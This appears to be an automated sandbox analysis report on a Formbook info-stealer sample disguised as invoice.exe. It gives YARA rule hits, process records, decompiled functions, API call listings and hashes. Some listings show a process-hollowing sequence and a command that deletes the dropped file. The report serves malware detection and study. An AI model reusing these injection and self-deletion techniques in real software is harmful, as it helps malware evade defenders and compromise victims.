                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6880 Parent PID: 6784

                                          General

                                          Start time:09:14:52
                                          Start date:20/11/2020
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\invoice.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 6756 Parent PID: 6880

                                          General

                                          Start time:09:14:53
                                          Start date:20/11/2020
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: invoice.exe PID: 5872 Parent PID: 6100 invoice.exeCOMMON

                                            Executed Functions

                                            Function 0030E1CF, Relevance: 124.4, APIs: 36, Strings: 35, Instructions: 193libraryloaderCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0030E1CF(void* __eax) {
				void* _t5;
				signed int _t74;
				struct HINSTANCE__* _t76;
				void* _t78;
				void* _t79;

				__imp__EncodePointer(0); // executed
				_t78 = __eax;
				E00316956(__eax);
				E00314530(_t78);
				E0031645D(_t78);
				_t5 = E00316970(_t78);
				E0031691F(_t5);
				E00316B81(_t78);
				_t79 = _t78;
				_push(_t79);
				_t76 = GetModuleHandleW(L"kernel32.dll");
				 *0x333a80 = GetProcAddress(_t76, "FlsAlloc") ^  *0x32e748;
				 *0x333a84 = GetProcAddress(_t76, "FlsFree") ^  *0x32e748;
				 *0x333a88 = GetProcAddress(_t76, "FlsGetValue") ^  *0x32e748;
				 *0x333a8c = GetProcAddress(_t76, "FlsSetValue") ^  *0x32e748;
				 *0x333a90 = GetProcAddress(_t76, "InitializeCriticalSectionEx") ^  *0x32e748;
				 *0x333a94 = GetProcAddress(_t76, "CreateEventExW") ^  *0x32e748;
				 *0x333a98 = GetProcAddress(_t76, "CreateSemaphoreExW") ^  *0x32e748;
				 *0x333a9c = GetProcAddress(_t76, "SetThreadStackGuarantee") ^  *0x32e748;
				 *0x333aa0 = GetProcAddress(_t76, "CreateThreadpoolTimer") ^  *0x32e748;
				 *0x333aa4 = GetProcAddress(_t76, "SetThreadpoolTimer") ^  *0x32e748;
				 *0x333aa8 = GetProcAddress(_t76, "WaitForThreadpoolTimerCallbacks") ^  *0x32e748;
				 *0x333aac = GetProcAddress(_t76, "CloseThreadpoolTimer") ^  *0x32e748;
				 *0x333ab0 = GetProcAddress(_t76, "CreateThreadpoolWait") ^  *0x32e748;
				 *0x333ab4 = GetProcAddress(_t76, "SetThreadpoolWait") ^  *0x32e748;
				 *0x333ab8 = GetProcAddress(_t76, "CloseThreadpoolWait") ^  *0x32e748;
				 *0x333abc = GetProcAddress(_t76, "FlushProcessWriteBuffers") ^  *0x32e748;
				 *0x333ac0 = GetProcAddress(_t76, "FreeLibraryWhenCallbackReturns") ^  *0x32e748;
				 *0x333ac4 = GetProcAddress(_t76, "GetCurrentProcessorNumber") ^  *0x32e748;
				 *0x333ac8 = GetProcAddress(_t76, "GetLogicalProcessorInformation") ^  *0x32e748;
				 *0x333acc = GetProcAddress(_t76, "CreateSymbolicLinkW") ^  *0x32e748;
				 *0x333ad0 = GetProcAddress(_t76, "SetDefaultDllDirectories") ^  *0x32e748;
				 *0x333ad8 = GetProcAddress(_t76, "EnumSystemLocalesEx") ^  *0x32e748;
				 *0x333ad4 = GetProcAddress(_t76, "CompareStringEx") ^  *0x32e748;
				 *0x333adc = GetProcAddress(_t76, "GetDateFormatEx") ^  *0x32e748;
				 *0x333ae0 = GetProcAddress(_t76, "GetLocaleInfoEx") ^  *0x32e748;
				 *0x333ae4 = GetProcAddress(_t76, "GetTimeFormatEx") ^  *0x32e748;
				 *0x333ae8 = GetProcAddress(_t76, "GetUserDefaultLocaleName") ^  *0x32e748;
				 *0x333aec = GetProcAddress(_t76, "IsValidLocaleName") ^  *0x32e748;
				 *0x333af0 = GetProcAddress(_t76, "LCMapStringEx") ^  *0x32e748;
				 *0x333af4 = GetProcAddress(_t76, "GetCurrentPackageId") ^  *0x32e748;
				 *0x333af8 = GetProcAddress(_t76, "GetTickCount64") ^  *0x32e748;
				 *0x333afc = GetProcAddress(_t76, "GetFileInformationByHandleExW") ^  *0x32e748;
				_t74 = GetProcAddress(_t76, "SetFileInformationByHandleW") ^  *0x32e748;
				 *0x333b00 = _t74;
				return _t74;
			}








                                            0x0030e1d2
                                            0x0030e1d8
                                            0x0030e1db
                                            0x0030e1e1
                                            0x0030e1e7
                                            0x0030e1ed
                                            0x0030e1f3
                                            0x0030e1f9
                                            0x0030e201
                                            0x0031227b
                                            0x0031228e
                                            0x003122a4
                                            0x003122b7
                                            0x003122ca
                                            0x003122dd
                                            0x003122f0
                                            0x00312303
                                            0x00312316
                                            0x00312329
                                            0x0031233c
                                            0x0031234f
                                            0x00312362
                                            0x00312375
                                            0x00312388
                                            0x0031239b
                                            0x003123a8
                                            0x003123c1
                                            0x003123d4
                                            0x003123e7
                                            0x003123fa
                                            0x0031240d
                                            0x00312420
                                            0x00312433
                                            0x00312446
                                            0x00312459
                                            0x0031246c
                                            0x0031247f
                                            0x00312492
                                            0x003124a5
                                            0x003124b8
                                            0x003124cb
                                            0x003124d8
                                            0x003124f1
                                            0x003124f8
                                            0x003124ff
                                            0x00312505

                                            APIs
                                            • RtlEncodePointer.NTDLL(00000000,?,00315FC2,0030E47F,0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E1D2
                                            • __initp_misc_winsig.LIBCMT ref: 0030E1ED
                                              • Part of subcall function 0031691F: EncodePointer.KERNEL32(003168D8,0030E1F8,00000000,00000000,00000000,00000000,00000000), ref: 00316924
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000050), ref: 00312282
                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00312296
                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003122A9
                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003122BC
                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003122CF
                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003122E2
                                            • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003122F5
                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312308
                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031231B
                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031232E
                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312341
                                            • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312354
                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312367
                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0031237A
                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0031238D
                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003123A0
                                            • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003123B3
                                            • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003123C6
                                            • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003123D9
                                            • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003123EC
                                            • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003123FF
                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00312412
                                            • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 00312425
                                            • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00312438
                                            • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 0031244B
                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0031245E
                                            • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 00312471
                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 00312484
                                            • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 00312497
                                            • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003124AA
                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003124BD
                                            • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003124D0
                                            • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 003124E3
                                            • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 003124F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$EncodePointer$HandleModule__initp_misc_winsig
                                            • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$VJc$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                            • API String ID: 1581159588-3046446558
                                            • Opcode ID: e7ad13b7076a28ef12e1e5000730d090a06124a28f32c4f218b72ae5e641fe8e
                                            • Instruction ID: 1cfe51571c5f6beb13a92fe79455b18a08173e72535dbeb0d360626bf2153cbd
                                            • Opcode Fuzzy Hash: e7ad13b7076a28ef12e1e5000730d090a06124a28f32c4f218b72ae5e641fe8e
                                            • Instruction Fuzzy Hash: E361607295026CAAA713AFB9FD87D8ABBFCFF55B01B04581EF180D2560D6B491818F90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030E3B4, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E0030E3B4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				signed int _v32;
				intOrPtr _v40;
				void* _t19;
				signed int _t20;
				intOrPtr _t29;
				signed int _t31;
				signed int _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t49;
				signed int _t50;
				void* _t63;
				void* _t64;
				void* _t65;
				signed int _t66;

				_t65 = __esi;
				_t64 = __edi;
				_t63 = __edx;
				_t49 = __ebx;
				while(1) {
					_t19 = E0030FA82(_t49, _t63, _t64, _a4);
					if(_t19 != 0) {
						break;
					}
					_t20 = E00316930(_t19, _a4);
					__eflags = _t20;
					if(_t20 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E0030D35C( &_v20,  &_v8);
						_v20 = 0x326154;
						E0030F4FA( &_v20, 0x32cb98);
						asm("int3");
						_push(0x14);
						_push(0x32cca8);
						E00316090(_t49, _t64, _t65);
						_t66 = E003121EA() & 0x0000ffff;
						E003179FB(2);
						__eflags =  *0x300000 - 0x5a4d; // 0x5a4d
						if(__eflags == 0) {
							_t29 =  *0x30003c; // 0xe8
							__eflags =  *((intOrPtr*)(_t29 + 0x300000)) - 0x4550;
							if( *((intOrPtr*)(_t29 + 0x300000)) != 0x4550) {
								goto L6;
							} else {
								__eflags =  *((intOrPtr*)(_t29 + 0x300018)) - 0x10b;
								if( *((intOrPtr*)(_t29 + 0x300018)) != 0x10b) {
									goto L6;
								} else {
									_t50 = 0;
									__eflags =  *((intOrPtr*)(_t29 + 0x300074)) - 0xe;
									if( *((intOrPtr*)(_t29 + 0x300074)) > 0xe) {
										__eflags =  *(_t29 + 0x3000e8);
										_t13 =  *(_t29 + 0x3000e8) != 0;
										__eflags = _t13;
										_t50 = 0 | _t13;
									}
								}
							}
						} else {
							L6:
							_t50 = 0;
						}
						_v32 = _t50;
						__eflags = E00315367();
						if(__eflags == 0) {
							E0030E555(0x1c);
						}
						_t31 = E00315FBD(_t50, _t64, __eflags);
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E0030E555(0x10);
						}
						E003164DB(_t31);
						_v8 = _v8 & 0x00000000;
						_t33 = E00317428(_t50, _t64, _t66, __eflags);
						__eflags = _t33;
						if(_t33 < 0) {
							E0030E555(0x1b);
						}
						 *0x334b28 = GetCommandLineW(); // executed
						_t35 = E00317AE4(); // executed
						 *0x331ca8 = _t35;
						__eflags = E003176DC();
						if(__eflags < 0) {
							_t36 = E0030E0FD(_t50, _t63, _t64, _t66, __eflags, 8);
						}
						__eflags = E00317919(_t36, _t50, _t63, _t64, _t66);
						if(__eflags < 0) {
							E0030E0FD(_t50, _t63, _t64, _t66, __eflags, 9);
						}
						__eflags = E0030E137(1);
						if(__eflags != 0) {
							E0030E0FD(_t50, _t63, _t64, _t66, __eflags, _t38);
						}
						_t39 = E00317B41();
						_push(_t66);
						_push(_t39);
						_push(0);
						_push(0x300000); // executed
						_t40 = L003024B0(_t50, _t64, __eflags); // executed
						_t67 = _t40;
						_v40 = _t40;
						__eflags = _t50;
						if(_t50 == 0) {
							E0030E3A0(_t67);
						}
						E0030E128();
						_v8 = 0xfffffffe;
						return E003160D5(_t67);
					} else {
						continue;
					}
					L27:
				}
				return _t19;
				goto L27;
			}





















                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3c9
                                            0x0030e3cc
                                            0x0030e3d4
                                            0x00000000
                                            0x00000000
                                            0x0030e3bf
                                            0x0030e3c5
                                            0x0030e3c7
                                            0x0030e3da
                                            0x0030e3df
                                            0x0030e3ea
                                            0x0030e3f7
                                            0x0030e3ff
                                            0x0030e404
                                            0x0030e405
                                            0x0030e407
                                            0x0030e40c
                                            0x0030e416
                                            0x0030e41b
                                            0x0030e426
                                            0x0030e42d
                                            0x0030e433
                                            0x0030e438
                                            0x0030e442
                                            0x00000000
                                            0x0030e444
                                            0x0030e449
                                            0x0030e450
                                            0x00000000
                                            0x0030e452
                                            0x0030e452
                                            0x0030e454
                                            0x0030e45b
                                            0x0030e45d
                                            0x0030e463
                                            0x0030e463
                                            0x0030e463
                                            0x0030e463
                                            0x0030e45b
                                            0x0030e450
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e466
                                            0x0030e46e
                                            0x0030e470
                                            0x0030e474
                                            0x0030e479
                                            0x0030e47a
                                            0x0030e47f
                                            0x0030e481
                                            0x0030e485
                                            0x0030e48a
                                            0x0030e48b
                                            0x0030e490
                                            0x0030e494
                                            0x0030e499
                                            0x0030e49b
                                            0x0030e49f
                                            0x0030e4a4
                                            0x0030e4ab
                                            0x0030e4b0
                                            0x0030e4b5
                                            0x0030e4bf
                                            0x0030e4c1
                                            0x0030e4c5
                                            0x0030e4ca
                                            0x0030e4d0
                                            0x0030e4d2
                                            0x0030e4d6
                                            0x0030e4db
                                            0x0030e4e4
                                            0x0030e4e6
                                            0x0030e4e9
                                            0x0030e4ee
                                            0x0030e4ef
                                            0x0030e4f4
                                            0x0030e4f5
                                            0x0030e4f6
                                            0x0030e4f8
                                            0x0030e4fd
                                            0x0030e502
                                            0x0030e504
                                            0x0030e507
                                            0x0030e509
                                            0x0030e50c
                                            0x0030e50c
                                            0x0030e511
                                            0x0030e546
                                            0x0030e554
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0030e3c7
                                            0x0030e3d9
                                            0x00000000

                                            APIs
                                            • _malloc.LIBCMT ref: 0030E3CC
                                              • Part of subcall function 0030FA82: __FF_MSGBANNER.LIBCMT ref: 0030FA99
                                              • Part of subcall function 0030FA82: __NMSG_WRITE.LIBCMT ref: 0030FAA0
                                              • Part of subcall function 0030FA82: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000050,00000050,?,0030D41B,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030FAC5
                                            • std::exception::exception.LIBCMT ref: 0030E3EA
                                            • __CxxThrowException@8.LIBCMT ref: 0030E3FF
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            • ___crtGetShowWindowMode.LIBCMT ref: 0030E411
                                              • Part of subcall function 003121EA: GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0030E416,0032CCA8,00000014,00000051,0032CB98), ref: 003121F4
                                            • _fast_error_exit.LIBCMT ref: 0030E474
                                            • _fast_error_exit.LIBCMT ref: 0030E485
                                            • __RTC_Initialize.LIBCMT ref: 0030E48B
                                            • __ioinit.LIBCMT ref: 0030E494
                                            • _fast_error_exit.LIBCMT ref: 0030E49F
                                            • GetCommandLineW.KERNEL32(0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E4A5
                                            • ___crtGetEnvironmentStringsW.LIBCMT ref: 0030E4B0
                                            • __wsetargv.LIBCMT ref: 0030E4BA
                                            • __wsetenvp.LIBCMT ref: 0030E4CB
                                            • __cinit.LIBCMT ref: 0030E4DE
                                            • __wwincmdln.LIBCMT ref: 0030E4EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _fast_error_exit$___crt$AllocateCommandEnvironmentExceptionException@8HeapInfoInitializeLineModeRaiseShowStartupStringsThrowWindow__cinit__ioinit__wsetargv__wsetenvp__wwincmdln_mallocstd::exception::exception
                                            • String ID: Ta2$\a2
                                            • API String ID: 2757819750-2893594904
                                            • Opcode ID: e90a3838e17893fc87c232b438e491a3764f173e9d5d2e79a9de4a3d5d6ec7cd
                                            • Instruction ID: a8b5f50910e59ede06034b124f5b0543a44fe6c2953130dc22ddb1d8c82f1f7d
                                            • Opcode Fuzzy Hash: e90a3838e17893fc87c232b438e491a3764f173e9d5d2e79a9de4a3d5d6ec7cd
                                            • Instruction Fuzzy Hash: AC3105347033159ADB2BBBB5DD73BAE3668AF04314F104C69F9049E1C2EFB0DA858691
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00302555, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 68memorythreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00302555(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t28;
				void* _t53;
				void* _t54;

				_t54 = __esi;
				_t53 = __edi;
				_t28 = __ebx;
			}






                                            0x00302555
                                            0x00302555
                                            0x00302555

                                            APIs
                                            • VirtualProtect.KERNELBASE(0032F5E0,00001E05,00000040,?), ref: 0030258E
                                            • EnumThreadWindows.USER32(00000000,0032F5E0,00000000), ref: 0030259D
                                            • __wsystem.LIBCMT ref: 003025A4
                                              • Part of subcall function 0030E3A0: _doexit.LIBCMT ref: 0030E3AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnumProtectThreadVirtualWindows__wsystem_doexit
                                            • String ID: 1.Install$Enter your choice:-> $$2.Reservation$3.Show$4.Buses Available. $5.Exit$cls$cO$rO$~O
                                            • API String ID: 547312409-3566016623
                                            • Opcode ID: ffcf3426c83b2fe316abb2633fa1b90d0f173abb0193e0784cbee3067a796377
                                            • Instruction ID: 3cde511f68dc46422909c1554492bb68d5764532c10ee44ba2d340ff64718694
                                            • Opcode Fuzzy Hash: ffcf3426c83b2fe316abb2633fa1b90d0f173abb0193e0784cbee3067a796377
                                            • Instruction Fuzzy Hash: AD119034A0A2105BD60376B06C7A7DFA3C69F83780F604834F5468F2D6FA60E9058796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00330CF1, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00330F26
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: D$b983b29ec09d413cae83040a9625fdd5
                                            • API String ID: 823142352-1726920427
                                            • Opcode ID: c40574ade15b15fbacfa96048b24ddee53a1eab647048707be4ca21cee46611f
                                            • Instruction ID: 74908b05d8d75f4ad5a27013e532864d320ee61d6827970400cecd5a5ff8e216
                                            • Opcode Fuzzy Hash: c40574ade15b15fbacfa96048b24ddee53a1eab647048707be4ca21cee46611f
                                            • Instruction Fuzzy Hash: 3BD11730D04398EEEF22CBA4DC85BEDBBB4AF04715F10409AE548BA291D7B54A85DF25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0032FB87, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0032FC4D
                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,003306A0,81AF6D4E,003301E3), ref: 0032FC77
                                            • ReadFile.KERNELBASE(00000000,00000000,003301E3,?,00000000,?,?,?,?,?,?,?,?,?,003306A0,81AF6D4E), ref: 0032FC8E
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,003306A0,81AF6D4E,003301E3), ref: 0032FCB0
                                            • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,003306A0), ref: 0032FD22
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 0032FD2D
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,003306A0,81AF6D4E,003301E3,00000000), ref: 0032FD78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                            • String ID:
                                            • API String ID: 656311269-0
                                            • Opcode ID: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
                                            • Instruction ID: 9425e0f0cf77cb468feb3b9bf110a8b73f63c625688349a665a7c555811f8eff
                                            • Opcode Fuzzy Hash: 93b28486482b233a9fc0f257d5a4c66314b912bb1555ae1b256415724baca865
                                            • Instruction Fuzzy Hash: 3A516C71E00329ABDB229FB4DC85FAEB7B8AF19710F104479F601FB285E6759901CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0032F5EC, Relevance: 6.3, APIs: 4, Instructions: 335threadprocessinjectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 0032F716
                                            • GetThreadContext.KERNELBASE(?,?), ref: 0032F735
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0032F755
                                            • SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 0032F912
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ContextProcessThread$CreateMemoryRead
                                            • String ID:
                                            • API String ID: 3262821800-0
                                            • Opcode ID: 830ddddae3edaf4670abf0ba71215dc2711f463ff9167a31ffcc576dbc25e3f9
                                            • Instruction ID: 6e2a4fecc127ad63957ef4ba9c9147bba0b5bc7941937da0433df625101777e3
                                            • Opcode Fuzzy Hash: 830ddddae3edaf4670abf0ba71215dc2711f463ff9167a31ffcc576dbc25e3f9
                                            • Instruction Fuzzy Hash: FEC14871D00229BFDF229FA4DD85BEEBBB9BF08300F144179E604BA190D775A985CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0031FABE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0031FABE(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0031EDCD(_t28, ?str?) != 0) {
					if(E0031EDCD(_t28, ?str?) != 0) {
						return E00321BAF(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                            0x0031fac2
                                            0x0031fac7
                                            0x0031faef
                                            0x00000000
                                            0x0031fb18
                                            0x0031fb0a
                                            0x0031fb36
                                            0x00000000
                                            0x0031fb36
                                            0x00000000
                                            0x0031fb0c
